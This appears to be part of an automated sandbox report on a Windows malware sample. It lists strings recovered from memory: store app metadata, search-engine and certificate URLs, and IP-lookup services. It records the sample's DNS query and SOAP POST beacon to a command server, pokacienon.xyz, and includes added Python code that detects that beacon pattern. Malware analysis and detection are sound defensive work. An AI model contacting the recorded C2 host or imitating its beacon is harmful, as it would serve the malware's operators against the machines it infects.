ackageIdentityName":"FACEBOOK.317180B0BB486","PublisherCertificateName":"CN=6E08453F-9BA7-4311-999C-D22FBA2FB1B8","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"c6a9fa5c-20a2-4e12-904d-edd408657dc8"},{"IdType":"LegacyWindowsPhoneProductId","Value":"3219d30d-4a23-4f58-a91c-c44b04e6a0c7"},{"IdType":"XboxTitleId","Value":"2004208728"}],"IngestionSource":"DCE","IsMicrosoftProduct":false,"PreferredSkuId":"0010","ProductType":"Application","ValidationData":{"PassedValidation":false,"RevisionId":"2021-04-06T17:58:28.3925008Z||.||9f1af5de-a917-4d59-b623-fd59991517bf||1152921505693355901||Null||fullrelease","ValidationResultUri":""},"MerchandizingTags":[],"PartD":"","ProductFamily":"Apps","ProductKind":"Application","DisplaySkuAvailabilities":[{"Sku":{"LastModifiedDate":"2021-04-06T17:57:25.3126054Z","LocalizedProperties":[{"SkuDescription":"Made for big screens and close connections. Get access to free* texting, and high-quality voice & video chat built specifically for desktop.\r\n\r\nMADE FOR DESKTOP, MADE
Source: svchost.exe, 0000000F.00000003.439186439.00000221A3B95000.00000004.00000001.sdmp String found in binary or memory: !\r\nCollect them all! Search for \"g5\" in Windows Store! \r\n____________________________\r\n\r\nVISIT US: www.g5e.com\r\nWATCH US: www.youtube.com/g5enter\r\nFIND US: www.facebook.com/HiddenCityGame\r\nJOIN US: https://instagram.com/hiddencity_\r\nFOLLOW US: www.twitter.com/g5games\r\nTerms of Service: http://www.g5e.com/termsofservice \r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","ProductTitle":"Hidden City: Hidden Object Adventure","SearchTitles":[{"SearchTitleString":"find hidden objects ","SearchTitleType":"SearchHint"},{"SearchTitleString":"junes pearls free ","SearchTitleType":"SearchHint"},{"SearchTitleString":"ispy notes peril","SearchTitleType":"SearchHint"},{"SearchTitleString":"seekers mystery ","SearchTitleType":"SearchHint"},{"SearchTitleString":"detective manor solving","SearchTitleType":"SearchHint"},{"SearchTitleString":"sherlock hotel spot it","SearchTitleType":"SearchHint"},{"SearchTitleString":"puzzle game journey 
","SearchTitleType":"SearchHint"}],"Language":"en","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductGame;1","ProductId":"9NBLGGH6J6VK","Properties":{"PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","PackageIdentityName":"828B5831.HiddenCityMysteryofShadows","PublisherCertificateName":"CN=A4F05332-BE3A-4155-B996-B100171CD4B1","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"8cb666bc-49d3-4722-bb14-5643aee3a729"},{"IdType":"LegacyWindowsPhoneProductId","Value":"94ad5279-e84a-4d40-b7cf-c6f16f916e6c"},{"IdType":"XboxTitleId","Value":"2124184622"}],"IngestionSourc
Source: svchost.exe, 0000000F.00000003.439186439.00000221A3B95000.00000004.00000001.sdmp String found in binary or memory: !\r\nCollect them all! Search for \"g5\" in Windows Store! \r\n____________________________\r\n\r\nVISIT US: www.g5e.com\r\nWATCH US: www.youtube.com/g5enter\r\nFIND US: www.facebook.com/HiddenCityGame\r\nJOIN US: https://instagram.com/hiddencity_\r\nFOLLOW US: www.twitter.com/g5games\r\nTerms of Service: http://www.g5e.com/termsofservice \r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","SkuTitle":"Hidden City: Hidden Object Adventure","Language":"en","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"ProductId":"9NBLGGH6J6VK","Properties":{"FulfillmentData":{"ProductId":"9NBLGGH6J6VK","WuCategoryId":"e15668ee-9cc1-4bc2-ba76-e91eb1
a11e95","PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","SkuId":"0011"},"FulfillmentType":null,"FulfillmentPluginId":null,"Packages":[{"Applications":[{"ApplicationId":"App"}],"Architectures":["x86"],"Capabilities":["internetClient"],"ExperienceIds":[],"MaxDownloadSizeInBytes":507060394,"PackageFormat":"EAppxBundle","PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","MainPackageFamilyNameForDlc":null,"PackageFullName":"828B5831.HiddenCityMysteryofShadows_1.40.4001.70_neutral_~_ytsefhwckbdv6","PackageId":"448e913e-e6bd-69c2-2c7f-25b80795f801-X86","PackageRank":30011,"PlatformDependencies":[{"MaxTested":2814750931222528,"MinVersion":2814750438195200,"PlatformName":"Windows.Xbox"}],"PlatformDependencyXmlBlob":"{\"blob.version\":1688867040526336,\"content.bundledPackages\":[\"828B5831.HiddenCityMysteryofShadows_1.40.4001.70_x86__ytsefhwckbdv6\"],\"content.isMain\":false,\"content.packageId\":\"828B5831.HiddenCityMysteryofShadows_1.40.4001.70_neutral_~_ytsefhwckbdv6\",\"content.productId\":\"94ad5279-e84a-4d40-b7cf-c6f16f916e6c\",\"content.targetPlatforms\":[{\"platf
Source: svchost.exe, 0000000F.00000003.439276219.00000221A4002000.00000004.00000001.sdmp String found in binary or memory: % Regular free updates with loads of new content\r\n____________________________ \r\n\r\nGame available in: English, French, Italian, German, Spanish, Portuguese, Brazilian Portuguese, Russian, Korean, Simplified Chinese, Traditional Chinese, Japanese, Arabic\r\n____________________________ \r\n\r\nSign up now for a weekly round-up of the best from G5 Games! www.g5e.com/e-mail\r\n____________________________ \r\n\r\nG5 Games - World of Adventures"!!\r\nCollect them all! Search for \"g5\" in Windows Store! \r\n____________________________\r\n\r\nVISIT US: www.g5e.com\r\nWATCH US: www.youtube.com/g5enter\r\nFIND US: www.facebook.com/HiddenCityGame\r\nJOIN US: https://instagram.com/hiddencity_\r\nFOLLOW US: www.twitter.com/g5games\r\nTerms of Service: http://www.g5e.com/termsofservice \r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","ProductTitle":"Hidden City: Hidden Object Adventure","SearchTitles":[{"SearchTitleString":"find hidden objects ","SearchTitleType":"SearchHint"},{"SearchTitleString":"junes pearls free ","SearchTitleType":"SearchHint"},{"SearchTitleString":"ispy notes peril","SearchTitleType":"SearchHint"},{"SearchTitleString":"seekers mystery ","SearchTitleType":"SearchHint"},{"SearchTitleString":"detective manor solving","SearchTitleType":"SearchHint"},{"SearchTitleString":"sherlock hotel spot it","SearchTitleType":"SearchHint"},{"SearchTitleString":"puzzle game journey 
","SearchTitleType":"SearchHint"}],"Language":"en","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductGame;1","ProductId":"9NBLGGH6J6VK","Properties":{"PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","PackageIdentityName
Source: 1wOdXavtlE.exe, 00000002.00000002.490169443.0000000003080000.00000004.00000001.sdmp String found in binary or memory: ium PDF Plugin","versions":[{"comment":"Chromium PDF Plugin has no version information.","status":"fully_trusted","version":"0"}]},"divx-player":{"group_name_matcher":"*DivX Web Player*","help_url":"https://support.google.com/chrome/?p=plugin_divx","lang":"en-US","mime_types":["video/divx","video/x-matroska"],"name":"DivX Web Player","url":"http://download.divx.com/player/divxdotcom/DivXWebPlayerInstaller.exe","versions":[{"status":"requires_authorization","version":"1.4.3.4"}]},"facebook-video-calling":{"group_name_matcher":"*Facebook Video*","lang":"en-US","mime_types":["application/skypesdk-plugin"],"name":"Facebook Video Calling","url":"https://www.facebook.com/chat/video/videocalldownload.php","versions":[{"comment":"We do not track version information for the Facebook Video Calling Plugin.","status":"requires_authorization","version":"0"}]},"google-chrome-pdf":{"group_name_matcher":"*Chrome PDF Viewer*","mime_types":[],"name":"Chrome PDF Viewer","versions":[{"comment":"Google Chrome PDF Viewer has no version information.","status":"fully_trusted","version":"0"}]},"google-chrome-pdf-plugin":{"group_name_matcher":"*Chrome PDF Plugin*","mime_types":[],"name":"Chrome PDF Plugin","versions":[{"comment":"Google Chrome PDF Plugin has no version information.","status":"fully_trusted","version":"0"}]},"google-earth":{"group_name_matcher":"*Google Earth*","lang":"en-US","mime_types":["application/geplugin"],"name":"Google Earth","url":"http://www.google.com/earth/explore/products/plugin.html","versions":[{"comment":"We do not track version information for the Google Earth Plugin.","status":"requires_authorization","version":"0"}]},"google-talk":{"group_name_matcher":"*Google Talk*","mime_types":[],"name":"Google Talk","versions":[{"comment":"'Google Talk Plugin' and 'Google Talk Plugin Video Accelerator' use two completely different versioning 
schemes, so we can't define a minimum version.","status":"requires_authorization","version":"0"}]},"google-update":{"group_name_matcher":"Google Update","mime-types":[],"name":"Google Update","versions":[{"comment":"Google Update plugin is versioned but kept automatically up to date","status":"requires_authorization","version":"0"}]},"ibm-java-runtime-environment":{"group_name_matcher":"*IBM*Java*","mime_types":["application/x-java-applet","application/x-java-applet;jpi-version=1.7.0_05","application/x-java-applet;version=1.1","application/x-java-applet;version=1.1.1","application/x-java-applet;version=1.1.2","application/x-java-applet;version=1.1.3","application/x-java-applet;version=1.2","application/x-java-applet;version=1.2.1","application/x-java-applet;version=1.2.2","application/x-java-applet;version=1.3","application/x-java-applet;version=1.3.1","application/x-java-applet;version=1.4","application/x-java-applet;version=1.4.1","application/x-java-applet;version=1.4.2","application/x-java-applet;version=1.5","application/x-java-applet;version=1.6","application/x-java-applet;version=1.7","application/x-java
Source: 1wOdXavtlE.exe, 00000002.00000002.487142544.0000000002EAE000.00000004.00000001.sdmp String found in binary or memory: l9https://www.facebook.com/chat/video/videocalldownload.php equals www.facebook.com (Facebook)
Source: svchost.exe, 0000000F.00000003.442380240.00000221A3B74000.00000004.00000001.sdmp String found in binary or memory: t enough.\r\n\r\nSHARE WITH FRIENDS\r\nSend photos and videos to keep your close friends up to speed. Receive files for even more productivity.\r\n\r\n\r\n*Calls are free over Wi-Fi but otherwise standard data charges apply.\r\nPrivacy Policy: https://www.facebook.com/about/privacy | LEARN MORE at: https://messenger.com (https://messenger.com/)","SkuTitle":"Messenger","Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"ProductId":"9WZDNCRF0083","Properties":{"FulfillmentData":{"ProductId":"9WZDNCRF0083","WuCategoryId":"c6a9fa5c-20a2-4e12-904d-edd408657dc8","PackageFamilyName":"Facebook.317180B0BB486_8xx8rvfyw5nnt","SkuId":"0010"},"FulfillmentType":"WindowsUpdate","Fu
lfillmentPluginId":null,"Packages":[{"Applications":[{"ApplicationId":"App"}],"Architectures":["x64"],"Capabilities":["runFullTrust","internetClient","Microsoft.storeFilter.core.notSupported_8wekyb3d8bbwe"],"ExperienceIds":[],"MaxDownloadSizeInBytes":137845484,"PackageFormat":"Appx","PackageFamilyName":"Facebook.317180B0BB486_8xx8rvfyw5nnt","MainPackageFamilyNameForDlc":null,"PackageFullName":"FACEBOOK.317180B0BB486_950.7.118.0_x64__8xx8rvfyw5nnt","PackageId":"9f0b5036-3839-33f0-1d64-45190b6cc3d7-X64","PackageRank":30002,"PlatformDependencies":[{"MaxTested":2814750970478592,"MinVersion":2814750438195200,"PlatformName":"Windows.Desktop"}],"PlatformDependencyXmlBlob":"{\"blob.version\":1688867040526336,\"content.isMain\":false,\"content.packageId\":\"FACEBOOK.317180B0BB486_950.7.118.0_x64__8xx8rvfyw5nnt\",\"content.productId\":\"3219d30d-4a23-4f58-a91c-c44b04e6a0c7\",\"content.targetPlatforms\":[{\"platform.maxVersionTested\":2814750970478592,\"platform.minVersion\":2814750438195200,\"platform.target\":3}],\"content.type\":7,\"policy\":{\"category.first\":\"app\",\"category.second\":\"Social\",\"optOut.backu
Source: unknown DNS traffic detected: queries for: pokacienon.xyz
Source: unknown HTTP traffic detected:
POST / HTTP/1.1
Content-Type: text/xml; charset=utf-8
SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
Host: pokacienon.xyz
Content-Length: 137
Expect: 100-continue
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
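The DNS query and the HTTP POST above are the sample's first contact with its server: a .NET SOAP client posting to the site root of pokacienon.xyz with a SOAPAction still in the http://tempuri.org/ placeholder namespace (the default a WCF service contract gets when the developer never sets one) and the Expect: 100-continue header that .NET's HttpWebRequest adds on its own. The Python below is an added example for turning that pattern into a detection; it is not part of the sandbox report. It parses raw HTTP request headers as a proxy or PCAP tool would hand them over, extracts the SOAP service and operation name, and flags requests that combine the placeholder namespace with a host outside a WCF allow-list. The first sample request reproduces the headers shown in the report (the POST body was not captured, so only headers are parsed); the second request and the allow-list host erp.corp.example are constructed for the demo.

```python
from __future__ import annotations

from dataclasses import dataclass, field

# Placeholder namespace a .NET WCF service contract gets when the developer
# never sets one. Production services normally override it; quick C2 endpoints
# usually do not.
TEMPURI = "http://tempuri.org/"

# Assumption for the demo: hosts known to run legitimate WCF/SOAP services.
KNOWN_WCF_HOSTS = {"erp.corp.example"}


@dataclass
class HttpRequest:
    method: str
    path: str
    headers: dict[str, str] = field(default_factory=dict)


def parse_request(raw: str) -> HttpRequest:
    """Parse the request line and header block of a raw HTTP/1.1 request."""
    lines = raw.split("\r\n")
    method, path, _version = lines[0].split(" ", 2)
    headers: dict[str, str] = {}
    for line in lines[1:]:
        if not line:  # empty line terminates the header block
            break
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return HttpRequest(method, path, headers)


def analyze(raw: str) -> dict:
    """Return SOAP service/operation plus the beacon indicators that matched."""
    req = parse_request(raw)
    action = req.headers.get("soapaction", "").strip('"')
    host = req.headers.get("host", "").split(":")[0].lower()
    indicators: list[str] = []
    service = operation = None

    if action.startswith(TEMPURI):
        indicators.append("default-wcf-namespace")
        # "http://tempuri.org/Endpoint/GetArguments" -> ("Endpoint", "GetArguments")
        parts = action[len(TEMPURI):].split("/")
        service, operation = parts[0], parts[-1]
    if action and host not in KNOWN_WCF_HOSTS:
        indicators.append("unknown-soap-host")
    if action and req.path == "/":
        indicators.append("soap-at-site-root")
    if req.headers.get("expect", "").lower() == "100-continue":
        # Sent by .NET HttpWebRequest by default; corroborating only, since
        # legitimate .NET clients send it too.
        indicators.append("dotnet-expect-100-continue")

    suspicious = {"default-wcf-namespace", "unknown-soap-host"} <= set(indicators)
    return {"host": host, "service": service, "operation": operation,
            "indicators": indicators, "suspicious": suspicious}


# Headers as shown in the report; body not captured, so only headers are given.
SAMPLE_BEACON = (
    "POST / HTTP/1.1\r\n"
    "Content-Type: text/xml; charset=utf-8\r\n"
    'SOAPAction: "http://tempuri.org/Endpoint/GetArguments"\r\n'
    "Host: pokacienon.xyz\r\n"
    "Content-Length: 137\r\n"
    "Expect: 100-continue\r\n"
    "Accept-Encoding: gzip, deflate\r\n"
    "Connection: Keep-Alive\r\n"
    "\r\n"
)

# Constructed: a legitimate internal WCF call with a real namespace and a
# service path, from a .NET client that also sends Expect: 100-continue.
SAMPLE_LEGIT = (
    "POST /OrderService.svc HTTP/1.1\r\n"
    "Content-Type: text/xml; charset=utf-8\r\n"
    'SOAPAction: "http://schemas.example.com/orders/IOrderService/Submit"\r\n'
    "Host: erp.corp.example\r\n"
    "Content-Length: 412\r\n"
    "Expect: 100-continue\r\n"
    "Connection: Keep-Alive\r\n"
    "\r\n"
)

if __name__ == "__main__":
    for sample in (SAMPLE_BEACON, SAMPLE_LEGIT):
        print(analyze(sample))
```

The decisive combination is the placeholder namespace on a host you do not run WCF on; the site-root path and the Expect header only raise confidence, because both also occur in benign .NET traffic. On a proxy with TLS inspection the same rule can be run on decrypted requests; without it, the DNS query for pokacienon.xyz and the plaintext POST are the observable events.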
Source: 1wOdXavtlE.exe, 00000002.00000002.531321702.0000000008140000.00000002.00000001.sdmp String found in binary or memory: http://%s.com
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp String found in binary or memory: http://amazon.fr/
Source: 1wOdXavtlE.exe, 00000002.00000002.487142544.0000000002EAE000.00000004.00000001.sdmp String found in binary or memory: http://appldnld.apple.com/QuickTime/041-3089.20111026.Sxpr4/QuickTimeInstaller.exe
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp String found in binary or memory: http://ariadna.elmundo.es/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp String found in binary or memory: http://ariadna.elmundo.es/favicon.ico
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp String found in binary or memory: http://arianna.libero.it/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp String found in binary or memory: http://arianna.libero.it/favicon.ico
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp String found in binary or memory: http://asp.usatoday.com/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp String found in binary or memory: http://asp.usatoday.com/favicon.ico
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp String found in binary or memory: http://auone.jp/favicon.ico
Source: 1wOdXavtlE.exe, 00000002.00000002.531321702.0000000008140000.00000002.00000001.sdmp String found in binary or memory: http://auto.search.msn.com/response.asp?MT=
Source: 1wOdXavtlE.exe, 00000002.00000002.486504849.0000000002E4E000.00000004.00000001.sdmp String found in binary or memory: http://bbuseruploads.s3.amazonaws.com
Source: 1wOdXavtlE.exe, 00000002.00000002.484483214.0000000002C30000.00000004.00000001.sdmp String found in binary or memory: http://bitbucket.org
Source: 1wOdXavtlE.exe, 00000002.00000002.483762527.0000000002BC1000.00000004.00000001.sdmp String found in binary or memory: http://bot.whatismyipaddress.com/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp String found in binary or memory: http://br.search.yahoo.com/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp String found in binary or memory: http://browse.guardian.co.uk/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp String found in binary or memory: http://browse.guardian.co.uk/favicon.ico
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp String found in binary or memory: http://busca.buscape.com.br/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp String found in binary or memory: http://busca.buscape.com.br/favicon.ico
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp String found in binary or memory: http://busca.estadao.com.br/favicon.ico
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp String found in binary or memory: http://busca.igbusca.com.br/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp String found in binary or memory: http://busca.igbusca.com.br//app/static/images/favicon.ico
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp String found in binary or memory: http://busca.orange.es/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp String found in binary or memory: http://busca.uol.com.br/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp String found in binary or memory: http://busca.uol.com.br/favicon.ico
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp String found in binary or memory: http://buscador.lycos.es/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp String found in binary or memory: http://buscador.terra.com.br/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp String found in binary or memory: http://buscador.terra.com/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp String found in binary or memory: http://buscador.terra.com/favicon.ico
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp String found in binary or memory: http://buscador.terra.es/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp String found in binary or memory: http://buscar.ozu.es/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp String found in binary or memory: http://buscar.ya.com/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp String found in binary or memory: http://busqueda.aol.com.mx/
Source: 1wOdXavtlE.exe, 00000002.00000003.399986812.0000000001111000.00000004.00000001.sdmp String found in binary or memory: http://cacerts.digicert.com/CloudflareIncECCCA-3.crt0
Source: 1wOdXavtlE.exe, 00000002.00000002.482862407.00000000010C3000.00000004.00000020.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertBaltimoreCA-2G2.crt0
Source: svchost.exe, 0000000F.00000002.465244340.00000221A3B00000.00000004.00000001.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: 1wOdXavtlE.exe, 00000002.00000002.484483214.0000000002C30000.00000004.00000001.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2ExtendedValidationServerCA.crt0
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp String found in binary or memory: http://cerca.lycos.it/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp String found in binary or memory: http://cgi.search.biglobe.ne.jp/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp String found in binary or memory: http://cgi.search.biglobe.ne.jp/favicon.ico
Source: 1wOdXavtlE.exe, 00000002.00000002.483762527.0000000002BC1000.00000004.00000001.sdmp String found in binary or memory: http://checkip.dyndns.org
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp String found in binary or memory: http://clients5.google.com/complete/search?hl=
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp String found in binary or memory: http://cnet.search.com/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp String found in binary or memory: http://cnweb.search.live.com/results.aspx?q=
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp String found in binary or memory: http://corp.naukri.com/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp String found in binary or memory: http://corp.naukri.com/favicon.ico
Source: 1wOdXavtlE.exe, 00000002.00000002.500485146.000000000443C000.00000004.00000001.sdmp String found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
Source: 1wOdXavtlE.exe, 00000002.00000003.399986812.0000000001111000.00000004.00000001.sdmp String found in binary or memory: http://crl3.digicert.com/CloudflareIncECCCA-3.crl07
Source: 1wOdXavtlE.exe, 00000002.00000002.482862407.00000000010C3000.00000004.00000020.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertBaltimoreCA-2G2.crl0:
Source: svchost.exe, 0000000F.00000002.465244340.00000221A3B00000.00000004.00000001.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: 1wOdXavtlE.exe, 00000002.00000002.482862407.00000000010C3000.00000004.00000020.sdmp String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0=
Source: 1wOdXavtlE.exe, 00000002.00000003.399986812.0000000001111000.00000004.00000001.sdmp String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0m
